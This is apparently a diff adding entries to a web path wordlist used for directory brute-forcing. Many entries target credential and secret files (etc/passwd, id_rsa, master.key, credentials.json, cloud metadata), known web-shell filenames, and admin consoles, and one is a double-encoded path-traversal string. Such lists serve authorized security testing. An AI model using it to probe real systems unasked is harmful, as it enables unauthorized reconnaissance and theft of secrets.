+CMakeLists.txt.user
+CMakeScripts
+cmd-asp-5.1.asp
+cmdasp.asp
+cmdasp.aspx
+cmdjsp.jsp
+cms-admin
+cms.csproj
+cms/
+cms/cms.csproj
+cms/Web.config
+cmsadmin
+cmsadmin.php
+cmsadmin/
+cmscockpit/
+cni-conf.json
+code.zip
+codeception.yml
+codeship/
+collectd/
+collectl/
+com.tar.gz
+com.zip
+command.php
+common.inc
+common.xml
+common/
+common/config/api.ini
+common/config/db.ini
+compass.rb
+compile
+compile_commands.json
+components/
+composer-bx.json
+composer.json
+composer.lock
+composer.phar
+composer/installed.json
+conditions
+conf
+conf/
+conf/Catalina
+conf/catalina.policy
+conf/catalina.properties
+conf/context.xml
+conf/logging.properties
+conf/server.xml
+conf/tomcat-users.xml
+conf/tomcat8.conf
+conf/web.xml
+config
+config.bak
+config.codekit
+config.codekit3
+config.core
+config.dat
+config.env
+config.guess
+config.h.in
+config.hash
+config.inc
+config.inc.bak
+config.inc.old
+config.inc.php
+config.inc.php.txt
+config.inc.php~
+config.inc.txt
+config.inc~
+config.ini
+config.ini.bak
+config.ini.old
+config.ini.txt
+config.json
+config.json.cfm
+config.local
+config.local.php_old
+config.local.php~
+config.old
+config.php
+config.php-eb
+config.php.bak
+config.php.bkp
+config.php.dist
+config.php.inc
+config.php.inc~
+config.php.new
+config.php.old
+config.php.save
+config.php.swp
+config.php.txt
+config.php.zip
+config.php~
+config.rb
+config.ru
+config.source
+config.sub
+config.txt
+config.xml
+config.yml
+config.zip
+Config/
+config/
+config/apc.php
+config/app.php
+config/app.yml
+config/AppData.config
+config/autoload/
+config/aws.yml
+config/banned_words.txt
+config/config.inc
+config/config.ini
+config/database.yml
+config/database.yml.pgsql
+config/database.yml.sqlite3
+config/database.yml_original
+config/database.yml~
+config/databases.yml
+config/db.inc
+config/development/
+config/initializers/secret_token.rb
+config/master.key
+config/monkcheckout.ini
+config/monkdonate.ini
+config/monkid.ini
+config/producao.ini
+config/routes.yml
+config/settings.inc
+config/settings.ini
+config/settings.ini.cfm
+config/settings.local.yml
+config/settings/production.yml
+config/site.php
+config/xml/
+config_override.php
+configprops
+configs.zip
+configs/
+Configs/authServerSettings.config
+configs/conf_bdd.ini
+configs/conf_zepass.ini
+Configs/Current/authServerSettings.config
+configuration.ini
+configuration.php
+configuration.php.bak
+configuration.php.dist
+configuration.php.old
+configuration.php.save
+configuration.php.swp
+configuration.php.txt
+configuration.php.zip
+configuration.php~
+configuration.zip
+configuration/
+configure
+configure.scan
+conflg.php
+confluence/
+conn.asp
+connect.inc
+connection.inc
+console
+console/
+console/base/config.json
+console/payments/config.json
+consul/
+containerLogs/
+content/
+content/debug.log
+contributing.md
+CONTRIBUTING.md
+contributors.txt
+control
+control.php
+control/
+controller.php
+controllers/
+controlpanel
+controlpanel.html
+controlpanel.php
+controlpanel/
+cookbooks
+cookie
+cookie.php
+COPYING
+COPYRIGHT.txt
+core.zip
+core/latest/swagger-ui/index.html
+count_admin
+cover
+cover_db/
+coverage
+coverage.data
+coverage.xml
+coverage/
+cp
+cp.html
+cp.php
+cp/
+cpanel
+Cpanel.php
+cpanel.php
+cpanel/
+cpanel_file/
+cpbackup-exclude.conf
+cpbt.php
+cpn.php
+craft/
+crash.log
+credentials
+credentials.csv
+credentials.json
+credentials.txt
+credentials.xml
+credentials/
+credentials/gcloud.json
+CREDITS
+crm/
+cron.log
+cron.php
+cron.sh
+cron/
+cron/cron.sh
+cron_import.log
+cron_sku.log
+crond/
+crond/logs/
+cronlog.txt
+cscockpit/
+csdp.cache
+csp/gateway/slc/api/swagger-ui.html
+css.php
+csx/
+CTestTestfile.cmake
+culeadora.txt
+custom/
+custom/db.ini
+customer_login/
+customers.csv
+customers.log
+customers.mdb
+customers.sql
+customers.sql.gz
+customers.sqlite
+customers.txt
+customers.xls
+CVS/
+cvs/
+CVS/Entries
+CVS/Root
+d.php
+d0main.php
+d0maine.php
+d0mains.php
+dam.php
+dat.tar.gz
+dat.zip
+data-nseries.tsv
+data.mdb
+data.sql
+data.sqlite
+data.tsv
+data.txt
+data/
+data/backups/
+data/cache/
+data/debug/
+data/DoctrineORMModule/cache/
+data/DoctrineORMModule/Proxy/
+data/files/
+data/logs/
+data/sessions/
+data/tmp/
+database
+database.csv
+database.inc
+database.log
+database.mdb
+database.php
+database.sql
+database.sqlite
+database.txt
+database.yml
+database.yml.pgsql
+database.yml.sqlite3
+database.yml_original
+database.yml~
+database.zip
+database/
+database/database/
+database/phpmyadmin/
+database/phpMyAdmin/
+database/phpMyAdmin2/
+database/phpmyadmin2/
+database_admin
+Database_Administration/
+Database_Backup/
+database_credentials.inc
+databases.yml
+databases.zip
+datadog/
+dataobject.ini
+davmail.log
+db
+DB
+db-admin
+db-admin/
+db-full.mysql
+db.csv
+db.inc
+db.ini
+db.log
+db.mdb
+Db.properties
+Db.script
+db.sql
+db.sqlite
+db.sqlite3
+db.xml
+db.yaml
+db.zip
+db/
+db/db-admin/
+db/dbadmin/
+db/dbweb/
+db/index.php
+db/main.mdb
+db/myadmin/
+db/phpMyAdmin-2/
+db/phpMyAdmin-3/
+db/phpMyAdmin/
+db/phpmyadmin/
+db/phpmyadmin2/
+db/phpMyAdmin2/
+db/phpmyadmin3/
+db/phpMyAdmin3/
+db/sql
+db/webadmin/
+db/webdb/
+db/websql/
+db1.mdb
+db1.sqlite
+db2
+db__.init.php
+db_admin
+db_backup.sql
+db_backups/
+db_session.init.php
+db_status.php
+dbaccess.log
+dbadmin.php
+dbadmin/
+dbadmin/index.php
+dbase
+dbase.sql
+dbbackup/
+dbdump.sql
+dbfix/
+dbweb/
+dead.letter
+DEADJOE
+debug
+debug-output.txt
+debug.inc
+debug.log
+debug.php
+debug.py
+debug.txt
+debug.xml
+debug/
+debug/pprof
+debug/routes
+debug_error.jsp
+delete.php
+demo
+demo.php
+demo/
+demo/ejb/index.html
+demo/ojspext/events/globals.jsa
+demo/sql/index.jsp
+demos/
+denglu
+denglu/
+denglu/admin.asp
+depcomp
+dependency-reduced-pom.xml
+deploy
+deploy.env
+deploy.rb
+deploy.sh
+deps
+deps/deps.jl
+DerivedData/
+DerivedDataCache/
+desk/
+Desktop.ini
+desktop/
+desktop/index_framed.htm
+dev
+dev.env
+dev.php
+dev.zip
+dev/
+devdata.db
+devel/
+devel_isolated/
+develop-eggs/
+development-parts/
+development.esproj/
+development.log
+development/
+deviceupdatefiles_ext/
+deviceupdatefiles_int/
+df_main.sql
+dfshealth.jsp
+dhcp_log/
+dialin/
+dir-login/
+dir.php
+directadmin/
+dist
+dist/
+dkms.conf
+dlldata.c
+dms/AggreSpy
+dms/DMSDump
+dns.alpha.kubernetes.io
+doc
+doc/
+doc/api/
+docker-compose-dev.yml
+docker-compose.yml
+docker/
+Dockerfile
+DocProject/buildhelp/
+DocProject/Help/html
+DocProject/Help/Html2
+docs
+docs.json
+docs/
+docs/_build/
+docs/api-docs.json
+doctrine/
+doctrine/schema/eirec.yml
+doctrine/schema/tmx.yml
+documentation
+documentation/
+documentation/config.yml
+dokuwiki/
+dom.php
+domcfg.nsf
+door.php
+dotenv.env
+down/
+down/login
+download/
+download/history.csv
+download/users.csv
+downloader/
+downloader/cache.cfg
+downloader/connect.cfg
+downloadFile.php
+downloads/
+downloads/dom.php
+dra.php
+dswsbobje/
+dswsbobje/happyaxis.jsp
+duckrails/mocks/
+dummy
+dummy.php
+dump
+dump.7z
+dump.html
+dump.inc
+dump.inc.old
+dump.json
+dump.log
+dump.old
+dump.rar
+dump.rdb
+dump.sh
+dump.sql
+dump.sql.old
+dump.sql.tgz
+dump.sqlite
+dump.tar
+dump.tar.bz2
+dump.tar.gz
+dump.tgz
+dump.txt
+dump.zip
+dump/
+dumper.php
+dumper/
+dumps/
+dwsync.xml
+dz.php
+dz0.php
+dz1.php
+eagle.epf
+ecf/
+ecosystem.json
+ecp/
+edit.php
+editor-4.0.0-en.php
+editor-4.0.0-mysql-en.php
+editor-4.0.0.php
+editor-4.0.1-en.php
+editor-4.0.1-mysql-en.php
+editor-4.0.1.php
+editor-4.0.2-en.php
+editor-4.0.2-mysql-en.php
+editor-4.0.2.php
+editor-4.0.3-en.php
+editor-4.0.3-mysql-en.php
+editor-4.0.3.php
+editor-4.1.0-en.php
+editor-4.1.0-mysql-en.php
+editor-4.1.0.php
+editor-4.2.0-en.php
+editor-4.2.0-mysql-en.php
+editor-4.2.0.php
+editor-4.2.1-en.php
+editor-4.2.1-mysql-en.php
+editor-4.2.1.php
+editor-4.2.2-en.php
+editor-4.2.2-mysql-en.php
+editor-4.2.2.php
+editor-4.2.3-en.php
+editor-4.2.3-mysql-en.php
+editor-4.2.3.php
+editor-4.2.4-en.php
+editor-4.2.4-mysql-en.php
+editor-4.2.4.php
+editor-4.2.5-en.php
+editor-4.2.5-mysql-en.php
+editor-4.2.5.php
+editor-4.3.0-en.php
+editor-4.3.0-mysql-en.php
+editor-4.3.0.php
+editor-4.3.1-en.php
+editor-4.3.1-mysql-en.php
+editor-4.3.1.php
+editor-4.4.0-en.php
+editor-4.4.0-mysql-en.php
+editor-4.4.0.php
+editor-4.5.0-en.php
+editor-4.5.0-mysql-en.php
+editor-4.5.0.php
+editor-4.6.0-en.php
+editor-4.6.0-mysql-en.php
+editor-4.6.0.php
+editor-4.6.1-en.php
+editor-4.6.1-mysql-en.php
+editor-4.6.1.php
+editor-4.6.2-en.php
+editor-4.6.2-mysql-en.php
+editor-4.6.2.php
+editor-4.6.3-en.php
+editor-4.6.3-mysql-en.php
+editor-4.6.3.php
+editor-4.7.0-en.php
+editor-4.7.0-mysql-en.php
+editor-4.7.0.php
+editor-4.7.1-en.php
+editor-4.7.1-mysql-en.php
+editor-4.7.1.php
+editor-4.7.2-en.php
+editor-4.7.2-mysql-en.php
+editor-4.7.2.php
+editor-4.7.3-en.php
+editor-4.7.3-mysql-en.php
+editor-4.7.3.php
+editor-4.7.4-en.php
+editor-4.7.4-mysql-en.php
+editor-4.7.4.php
+editor-4.7.5-en.php
+editor-4.7.5-mysql-en.php
+editor-4.7.5.php
+editor-4.7.6-en.php
+editor-4.7.6-mysql-en.php
+editor-4.7.6.php
+editor-4.7.7-en.php
+editor-4.7.7-mysql-en.php
+editor-4.7.7.php
+editor-4.7.8-en.php
+editor-4.7.8-mysql-en.php
+editor-4.7.8.php
+editor-4.7.9-en.php
+editor-4.7.9-mysql-en.php
+editor-4.7.9.php
+editor-4.8.0-en.php
+editor-4.8.0-mysql-en.php
+editor-4.8.0.php
+editor-4.8.1-en.php
+editor-4.8.1-mysql-en.php
+editor-4.8.1.php
+editor.php
+editor/
+editor/FCKeditor
+editor/stats/
+editor/tiny_mce/
+editor/tinymce/
+editors/
+editors/FCKeditor
+EemAdminService/EemAdmin?wsdl
+eggs/
+ehthumbs.db
+elastic/
+elasticsearch/
+elfinder/
+elfinder/elfinder.php
+elm-stuff
+elmah.axd
+email/
+encode-explorer.php
+encode-explorer_5.0/
+encode-explorer_5.1/
+encode-explorer_6.0/
+encode-explorer_6.1/
+encode-explorer_6.2/
+encode-explorer_6.3/
+encode-explorer_6.4.1/
+encode-explorer_6.4/
+encode_explorer-3.2/
+encode_explorer-3.3/
+encode_explorer-3.4/
+encode_explorer-4.0/
+encode_explorer.php
+encode_explorer/
+encode_explorer_32/
+engine.tar.gz
+engine.zip
+engine/
+engine/classes/swfupload/swfupload.swf
+engine/classes/swfupload/swfupload_f9.swf
+engine/log.txt
+env
+env.bak/
+env.js
+env.json
+env.list
+ENV/
+env/
+environment.rb
+erl_crash.dump
+err
+err.log
+err.txt
+error
+error-log
+error-log.txt
+error.asp
+error.cpp
+error.ctp
+error.html
+error.ini
+error.log
+error.log.0
+error.tmpl
+error.tpl
+error.txt
+error.xml
+error/
+error_import
+error_log
+error_log.gz
+error_log.txt
+errorlog
+errorPages
+errors.asp
+errors.log
+errors.tpl
+errors.txt
+errors/
+errors/creation
+errors/local.xml
+etc
+etc/
+etc/config.ini
+etc/database.xml
+etc/hosts
+etc/lib/pChart2/examples/imageMap/index.php
+etc/passwd
+etcd-apiserver-client.key
+etcd-ca.crt
+etcd-events.log
+etcd.log
+eudora.ini
+eula.txt
+eula_en.txt
+ews/
+example.php
+examples
+examples/
+examples/jsp/%252e%252e/%252e%252e/manager/html/
+examples/jsp/snp/snoop.jsp
+examples/servlet/SnoopServlet
+examples/servlets/servlet/CookieExample
+examples/servlets/servlet/RequestHeaderExample
+exception.log
+exchange/
+exchweb/
+exec
+expires.conf
+exploded-archives/
+explore
+explore/repos
+explorer
+export
+export.cfg
+export/
+export_presets.cfg
+ExportedObj/
+exports.zip
+ext/
+ext/.deps
+ext/build/
+ext/config
+ext/install-sh
+ext/libtool
+ext/ltmain.sh
+ext/Makefile
+ext/missing
+ext/mkinstalldirs
+ext/modules/
+ext/run-tests.php
+extjs/
+extjs/resources//charts.swf
+extras/documentation
+ezsqliteadmin/
+fabric/
+fake-eggs/
+FakesAssemblies/
+FAQ
+fastlane/Preview.html
+fastlane/readme.md
+fastlane/report.xml
+fastlane/screenshots
+fastlane/test_output
+fcgi-bin/echo
+fcgi-bin/echo.exe
+fcgi-bin/echo2
+fcgi-bin/echo2.exe
+fckeditor
+FCKeditor
+fckeditor/
+FCKeditor/
+fckeditor/editor/filemanager/browser/default/connectors/asp/connector.asp
+fckeditor/editor/filemanager/browser/default/connectors/aspx/connector.aspx
+fckeditor/editor/filemanager/browser/default/connectors/php/connector.php
+fckeditor/editor/filemanager/connectors/asp/connector.asp
+fckeditor/editor/filemanager/connectors/asp/upload.asp
+fckeditor/editor/filemanager/connectors/aspx/connector.aspx
+fckeditor/editor/filemanager/connectors/aspx/upload.aspx
+fckeditor/editor/filemanager/connectors/php/connector.php
+fckeditor/editor/filemanager/connectors/php/upload.php
+fckeditor/editor/filemanager/upload/asp/upload.asp
+fckeditor/editor/filemanager/upload/aspx/upload.aspx
+fckeditor/editor/filemanager/upload/php/upload.php
+FCKeditor2.0/
+FCKeditor2.1/
+FCKeditor2.2/
+FCKeditor2.3/
+FCKeditor2.4/
+FCKeditor2/
+FCKeditor20/
+FCKeditor21/
+FCKeditor22/
+FCKeditor23/
+FCKeditor24/
+features
+features.json
+feixiang.php
+file.php
+file_manager/
+file_upload.asp
+file_upload.aspx
+file_upload.cfm
+file_upload.htm
+file_upload.html
+file_upload.php
+file_upload.php3
+file_upload.shtm
+file_upload/
+fileadmin
+fileadmin.php
+fileadmin/
+fileadmin/_processed_/
+fileadmin/_temp_/
+fileadmin/user_upload/
+filedump/
+filemanager
+filemanager/
+filemanager/views/js/ZeroClipboard.swf
+filerun.php
+filerun/
+files.7z
+files.md5
+files.php
+files.rar
+files.tar
+files.tar.bz2
+files.tar.gz
+files.zip
+files/
+Files/binder.autosave
+Files/binder.backup
+files/cache/
+Files/Docs/docs.checksum
+Files/search.indexes
+files/tmp/
+Files/user.lock
+fileupload/
+FileZilla.xml
+filezilla.xml
+findbugs/
+firebase-debug.log
+flash/
+flash/ZeroClipboard.swf
+flashFXP.ini
+fluent.conf
+fluent_aggregator.conf
+flyway
+fmr.php
+formslogin/
+forum.rar
+forum.sql
+forum.tar
+forum.tar.bz2
+forum.tar.gz
+forum.zip
+forum/
+forum/install/install.php
+forums/
+forums/cache/db_update.lock
+fpadmin
+fpadmin/
+fpm-ping
+fpm-status
+framework.zip
+framework/yiic.php
+freeline.py
+freeline/
+freeline_project_description.json
+ftp.txt
+fuel/app/cache/
+fuel/app/config/
+fuel/app/logs/
+function.require
+functions/
+ganglia/
+gateway/
+gaza.php
+gbpass.pl
+Gemfile
+Gemfile.lock
+GEMINI/
+gen/
+Generated_Code/
+get.php
+getFile.cfm
+git-service
+git/
+github-cache
+github-recovery-codes.txt
+github/
+gitlab/
+gitlog
+gl/
+global
+global.asa
+global.asa.bak
+global.asa.old
+global.asa.orig
+global.asa.temp
+global.asa.tmp
+global.asax
+global.asax.bak
+global.asax.old
+global.asax.orig
+global.asax.temp
+global.asax.tmp
+globals
+globals.inc
+globals.jsa
+globes_admin/
+glpi/
+google-services.json
+grabbed.html
+gradle-app.setting
+gradle/
+grafana/
+graphiql
+graphiql.php
+graphiql/
+graphite/
+graphql
+graphql.js
+graphql.php
+graphql/
+graphql/console/
+grappelli/
+graylog/
+groovy/
+groupexpansion/
+Gruntfile.coffee
+gruntfile.coffee
+GruntFile.coffee
+gruntfile.js
+Gruntfile.js
+gruntFile.js
+guanli
+guanli/
+guanli/admin.asp
+Guardfile
+gulp-azure-sync-assets.js
+Gulpfile
+gulpfile.coffee
+Gulpfile.coffee
+gulpfile.js
+Gulpfile.js
+gwt-unitCache/
+h2console
+hac/
+happyaxis.jsp
+haproxy/
+health
+health.json
+healthcheck.php
+heapdump
+heapdump.json
+HISTORY
+HISTORY.txt
+hmc/
+HNAP1/
+hndUnblock.cgi
+home.html
+home.php
+home.rar
+home.tar
+home.tar.bz2
+home.tar.gz
+home.zip
+Homestead.json
+Homestead.yaml
+host-manager/
+host-manager/html
+hosts
+houtai
+houtai/
+houtai/admin.asp
+hpwebjetadmin/
+hs_err_pid.log
+htaccess.backup
+htaccess.bak
+htaccess.dist
+htaccess.old
+htaccess.txt
+htdocs
+htdocs.zip
+htgroup
+html.tar
+html.tar.bz2
+html.tar.gz
+html.zip
+html/
+html/config.rb
+html/js/misc/swfupload/swfupload.swf
+html/js/misc/swfupload/swfupload_f9.swf
+htmlcov/
+htpasswd
+htpasswd.bak
+htpasswd/
+htpasswd/htpasswd.bak
+Http/
+Http/DataLayCfg.xml
+http_access.log
+httpd.conf
+httpd.conf.backup
+httpd.conf.default
+httpd.core
+httpd.ini
+httpd/
+httpd/logs/access.log
+httpd/logs/access_log
+httpd/logs/error.log
+httpd/logs/error_log
+httptrace
+hudson/
+hudson/login
+hybridconfig/
+hystrix
+i.php
+icinga/
+id_dsa
+id_dsa.ppk
+id_rsa
+id_rsa.pub
+iiasdmpwd/
+iisadmin/
+images/
+images/c99.php
+images/Sym.php
+import.php
+import/
+import_error.log
+importcockpit/
+in/
+inc/
+inc/config.inc
+inc/fckeditor/
+inc/tiny_mce/
+inc/tinymce/
+include
+include/
+include/fckeditor/
+includes
+includes/
+includes/adovbs.inc
+includes/bootstrap.inc
+includes/configure.php~
+includes/fckeditor/editor/filemanager/browser/default/connectors/asp/connector.asp
+includes/fckeditor/editor/filemanager/browser/default/connectors/aspx/connector.aspx
+includes/fckeditor/editor/filemanager/browser/default/connectors/php/connector.php
+includes/fckeditor/editor/filemanager/connectors/asp/connector.asp
+includes/fckeditor/editor/filemanager/connectors/asp/upload.asp
+includes/fckeditor/editor/filemanager/connectors/aspx/connector.aspx
+includes/fckeditor/editor/filemanager/connectors/aspx/upload.aspx
+includes/fckeditor/editor/filemanager/connectors/php/connector.php
+includes/fckeditor/editor/filemanager/connectors/php/upload.php
+includes/fckeditor/editor/filemanager/upload/asp/upload.asp
+includes/fckeditor/editor/filemanager/upload/aspx/upload.aspx
+includes/fckeditor/editor/filemanager/upload/php/upload.php
+includes/js/tiny_mce/
+includes/swfupload/swfupload.swf
+includes/swfupload/swfupload_f9.swf
+includes/tiny_mce/
+includes/tinymce/
+index-bak
+index-test.php
+index.htm
+index.html
+index.php
+index.php-bak
+index.php.bak
+index.php3
+index.php4
+index.php5
+index.php~
+index.tar
+index.tar.bz2
+index.tar.gz
+index.xml
+index.zip
+index2.php
+index3.php
+index_manage
+Indy_admin/
+influxdb/
+info
+info.json
+info.php
+info.txt
+infos.php
+ingress.yaml
+init/
+inspector
+instadmin/
+Install
+install
+INSTALL
+install-log.txt
+install-sh
+install.asp
+install.aspx
+install.bak
+install.config
+install.htm
+INSTALL.HTML
+INSTALL.html
+Install.html
+install.html
+install.inc
+INSTALL.MD
+install.md
+Install.md
+INSTALL.md
+INSTALL.mysql
+install.mysql
+install.mysql.txt
+INSTALL.mysql.txt
+install.pgsql
+INSTALL.pgsql
+INSTALL.pgsql.txt
+install.pgsql.txt
+install.php
+install.rdf
+install.sql
+install.tpl
+install.txt
+Install.txt
+INSTALL.txt
+INSTALL.TXT
+install.zip
+install/
+install/index.php?upgrade/
+install/update.log
+install_
+INSTALL_admin
+install_manifest.txt
+install_mgr.log
+installation.php
+installation/
+installed.json
+InstalledFiles
+installer
+installer-backup.php
+installer-data.sql
+installer-log.txt
+installer.php
+installer_files/
+install~/
+instance/
+integrationgraph
+Intermediate/
+internal/docs
+invoker/
+invoker/JMXInvokerServlet
+invoker/readonly/JMXInvokerServlet
+invoker/restricted/JMXInvokerServlet
+io.swf
+iOSInjectionProject/
+ipch/
+irc-macadmin/
+irequest/
+isadmin
+isadmin.php
+ispmgr/
+iwa/authenticated.aspx
+iwa/iwa_test.aspx
+j2ee/servlet/SnoopServlet
+jacoco/
+Jakefile
+javascripts/bundles
+javax.faces.resource.../
+javax.faces.resource.../WEB-INF/web.xml.jsf
+jboss-net/
+jboss-net//happyaxis.jsp
+jboss-net/happyaxis.jsp
+jboss/server/all/deploy/project.ext
+jboss/server/all/log/
+jboss/server/default/deploy/project.ext
+jboss/server/default/log/
+jboss/server/minimal/deploy/project.ext
+jbossws/services
+jbpm-console/app/tasks.jsf
+jdbc
+jdkstatus
+jenkins/
+Jenkinsfile
+jira/
+jk-status
+jk/
+jkmanager
+jkmanager-auth
+jkstatus
+jkstatus-auth
+jmx-console
+jmx-console/
+jmx-console/HtmlAdaptor?action=inspectMBean&name=jboss.system:type=ServerInfo
+jo.php
+jolokia
+jolokia/
+jolokia/list
+joomla.rar
+joomla.xml
+joomla.zip
+joomla/
+joomla/administrator
+js/
+js/elfinder/elfinder.php
+js/envConfig.js
+js/FCKeditor
+js/prepod.js
+js/prod.js
+js/qa.js
+js/routing
+js/swfupload/swfupload.swf
+js/swfupload/swfupload_f9.swf
+js/tiny_mce/
+js/tinymce/
+js/yui/uploader/assets/uploader.swf
+js/ZeroClipboard.swf
+js/ZeroClipboard10.swf
+jscripts/
+jscripts/tiny_mce/
+jscripts/tiny_mce/plugins/ajaxfilemanager/ajaxfilemanager.php
+jscripts/tinymce/
+jsp-examples/
+jsp-reverse.jsp
+jsp/viewer/snoop.jsp
+jspm_packages/
+jssresource/
+juju/
+junit/
+kafka/
+kairosdb/
+karma.conf.js
+kcfinder/
+kcfinder/browse.php
+key.pem
+keys.json
+kibana/
+killer.php
+known_tokens.csv
+kpanel/
+krb.log
+krblog.txt
+kube-apiserver.log
+kube-controller-manager.log
+kube-proxy.log
+kube-scheduler.log
+kube/
+kuber/
+kubernetes/
+l0gs.txt
+L3b.php
+lander.logs
+latest/meta-data/hostname
+latest/user-data
+layouts/
+ldap.prop
+ldap.prop.sample
+ldap/
+letmein
+letmein.php
+letmein/
+level
+lfm.php
+lg/
+lg/lg.conf
+lia.cache
+lib-cov
+lib/
+lib/bundler/man/
+lib/fckeditor/
+lib/flex/uploader/.actionScriptProperties
+lib/flex/uploader/.flexProperties
+lib/flex/uploader/.project
+lib/flex/uploader/.settings
+lib/flex/varien/.actionScriptProperties
+lib/flex/varien/.flexLibProperties
+lib/flex/varien/.project
+lib/flex/varien/.settings
+lib/tiny_mce/
+lib/tinymce/
+lib64/
+libraries/
+libraries/phpmailer/
+libraries/tiny_mce/
+libraries/tinymce/
+librepag.log
+LICENSE
+license
+license.md
+LICENSE.md
+license.php
+license.txt
+LICENSE.txt
+license_key.php
+liferay.log
+liferay/
+lighttpd.access.log
+lighttpd.error.log
+lilo.conf
+lindex.php
+linkhub/
+linkhub/linkhub.log
+linktous.html
+linusadmin-phpinfo.php
+liquibase
+list_emails
+listener.log
+lists/
+lists/config
+LiveUser_Admin/
+lk/
+load.php
+local.config.rb
+local.properties
+local.xml.additional
+local.xml.template
+local/
+local/composer.lock
+local/composer.phar
+local_bd_new.txt
+local_bd_old.txt
+local_conf.php.bac
+local_conf.php.bak
+local_settings.py
+localhost.sql
+localsettings.php.bak
+localsettings.php.dist
+localsettings.php.old
+localsettings.php.save
+localsettings.php.swp
+localsettings.php.txt
+localsettings.php~
+log
+log-in
+log-in.php
+log-in/
+log.htm
+log.html
+log.json
+log.mdb
+log.php
+log.sqlite
+log.txt
+log/
+log/access.log
+log/access_log
+log/authorizenet.log
+log/development.log
+log/error.log
+log/error_log
+log/exception.log
+log/librepag.log
+log/log.log
+log/log.txt
+log/old
+log/payment.log
+log/payment_authorizenet.log
+log/payment_paypal_express.log
+log/production.log
+log/server.log
+log/test.log
+log/www-error.log
+log_1.txt
+log_errors.txt
+log_in
+log_in.php
+log_in/
+logexpcus.txt
+logfile
+logfile.txt
+logfiles
+loggers
+loggers.json
+loggers/
+logi.php
+login
+login-gulp.js
+login-redirect/
+login-us/
+login.asp
+login.cgi
+login.htm
+login.html
+login.json
+login.php
+login/
+login/admin/admin.asp
+login/index
+login/login
+login/super
+login1
+login1/
+login_admi
+login_admin
+login_admin/
+login_db/
+login_ou.php
+login_out
+login_out/
+login_use.php
+login_user
+loginerror/
+loginflat/
+loginok/
+logins.txt
+loginsave/
+loginsupe.php
+loginsuper
+loginsuper/
+logo_sysadmin/
+logou.php
+logout
+logout.asp
+logout/
+logs
+logs.htm
+logs.html
+logs.mdb
+logs.pl
+logs.sqlite
+logs.txt
+Logs/
+logs/
+logs/access.log
+logs/access_log
+logs/error.log
+logs/error_log
+logs/liferay.log
+logs/mail.log
+logs/proxy_access_ssl_log
+logs/proxy_error_log
+logs/wsadmin.traceout
+logs/www-error.log
+logs_backup/
+logs_console/
+logstash/
+lol.php
+Lotus_Domino_Admin/
+ltmain.sh
+luac.out
+m4/libtool.m4
+m4/ltoptions.m4
+m4/ltsugar.m4
+m4/ltversion.m4
+m4/lt~obsolete.m4
+macadmin/
+madspot.php
+madspotshell.php
+magic.default
+magmi/
+magmi/conf/magmi.ini
+mail
+mail.log
+mail/
+Mail/smtp/Admin/smadv.asp
+mailer/.env
+mailman/
+mailman/listinfo
+main.env
+main.mdb
+main.zip
+main/
+main/login
+maint/
+MAINTAINERS.txt
+maintenance.flag
+maintenance.flag.bak
+maintenance.flag2
+maintenance.html
+maintenance.php
+maintenance/
+maintenance/test.php
+maintenance/test2.php
+Makefile
+Makefile.in
+Makefile.old
+manage
+manage.php
+manage.py
+manage/
+manage/admin.asp
+manage/login.asp
+manage_index
+management
+management.php
+management/
+management/configprops
+management/env
+manager
+manager.php
+manager/
+manager/admin.asp
+manager/html
+manager/login
+manager/login.asp
+manager/status/all
+MANIFEST
+MANIFEST.bak
+manifest.mf
+MANIFEST.MF
+manifest.yml
+manifest/cache/
+manifest/logs/
+manifest/tmp/
+manuallogin/
+mappings
+mappings.json
+master.passwd
+master.tar
+master.tar.bz2
+master.tar.gz
+master.zip
+master/
+master/portquotes_new/admin.log
+mattermost/
+maven/
+mbox
+mcollective/
+mcx/
+mcx/mcxservice.svc
+mdate-sh
+media.tar
+media.tar.bz2
+media.tar.gz
+media.zip
+media/
+media/export-criteo.xml
+meet/
+meeting/
+member
+member.php
+member/
+member/admin.asp
+member/login.asp
+memberadmin
+memberadmin.php
+memberadmin/
+memberlist
+members
+members.csv
+members.log
+members.mdb
+members.php
+members.sql
+members.sql.gz
+members.sqlite
+members.txt
+members.xls
+members/
+membersonly
+memcached/
+memlogin/
+mercurial.ini
+mercurial/
+Mercury.modules
+Mercury/
+mesos/
+META-INF/
+META-INF/context.xml
+META.json
+META.yml
+meta_login/
+metadata.rb
+metric/
+metric_tracking
+metric_tracking.json
+metrics
+metrics.json
+metrics/
+microsoft-server-activesync/
+mics/
+mics/mics.html
+mifs/
+mifs/user/index.html
+migration.log
+mimosa-config.coffee
+mimosa-config.js
+mirror.cfg
+mirror/
+misc
+missing
+mkdocs.yml
+Mkfile.old
+moadmin.php
+moadmin/
+mock/
+modelsearch/
+modelsearch/admin.html
+modelsearch/admin.php
+modelsearch/index.html
+modelsearch/index.php
+modelsearch/login
+modelsearch/login.html
+modelsearch/login.php
+moderator
+moderator.html
+moderator.php
+moderator/
+moderator/admin
+moderator/admin.html
+moderator/admin.php
+moderator/login
+moderator/login.html
+moderator/login.php
+modern.json
+modern.jsonp
+Module.symvers
+module.zip
+modules.order
+modules/
+modules/admin/
+mongo/
+mongodb/
+monit/
+monitor
+monitor/
+monitoring
+monitoring/
+moving.page
+mrtg.cfg
+msg/
+msg_gen/
+msmtp_default.log
+msql/
+mssql/
+mt-check.cgi
+munin/
+muracms.esproj
+mw-config/
+mx.php
+my.7z
+my.rar
+my.tar
+my.tar.bz2
+my.tar.gz
+my.zip
+myadm/
+MyAdmin/
+myadmin/
+myadmin/index.php
+MyAdmin/scripts/setup.php
+myadmin/scripts/setup.php
+myadmin2/index.php
+myadminscripts/
+myadminscripts/setup.php
+myconf.env
+myserver.key
+mysql-admin/
+mysql-admin/index.php
+mysql.err
+mysql.log
+mysql.php
+mysql.sql
+mysql.tar
+mysql.tar.bz2
+mysql.tar.gz
+mysql.zip
+mysql/
+mysql/admin/
+mysql/db/
+mysql/dbadmin/
+mysql/index.php
+mysql/mysqlmanager/
+mysql/pma/
+mysql/pMA/
+mysql/scripts/setup.php
+mysql/sqlmanager/
+mysql/web/
+mysql_debug.sql
+mysqladmin/
+mysqladmin/index.php
+mysqladmin/scripts/setup.php
+mysqldump.sql
+mysqldumper/
+mysqlitedb.db
+mysqlmanager/
+naginator/
+nagios/
+nano.save
+native_stderr.log
+native_stdout.log
+navSiteAdmin/
+nb-configuration.xml
+nbactions.xml
+nbproject/
+nbproject/private/private.properties
+nbproject/private/private.xml
+nbproject/project.properties
+nbproject/project.xml
+netdata/
+New%20Folder
+New%20folder%20(2)
+new.7z
+new.php
+new.rar
+new.tar
+new.tar.bz2
+new.tar.gz
+new.zip
+newbbs/
+newbbs/login
+newsadmin/
+nextcloud/
+nfs/
+ng-cli-backup.json
